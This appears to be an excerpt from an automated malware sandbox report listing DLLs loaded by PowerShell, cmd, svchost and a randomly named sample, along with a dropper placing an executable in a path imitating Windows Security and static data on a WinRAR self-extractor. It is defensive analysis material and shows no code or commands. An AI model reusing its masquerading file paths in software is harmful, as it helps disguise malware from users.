Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: apphelp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: version.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: sspicli.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ktmw32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: rasapi32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: rasman.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: rtutils.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: mswsock.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: winhttp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: dnsapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: winnsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: dwrite.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: edputil.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: amsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: userenv.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: winmm.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: winmmbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: mmdevapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: devobj.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ksuser.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: avrt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: audioses.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: powrprof.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: umpdc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: msacm32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: midimap.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: windowscodecs.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ntmarta.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: dpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: secur32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: schannel.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ntasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ncrypt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: msasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\portintosvc\driverInto.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe			Jump to behavior
Source: C:\portintosvc\driverInto.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a			Jump to behavior

Source: Vqzx4PFehn.exe

Static file information: File size 1789751 > 1048576

Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Vqzx4PFehn.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Vqzx4PFehn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Vqzx4PFehn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe

Source: Vqzx4PFehn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
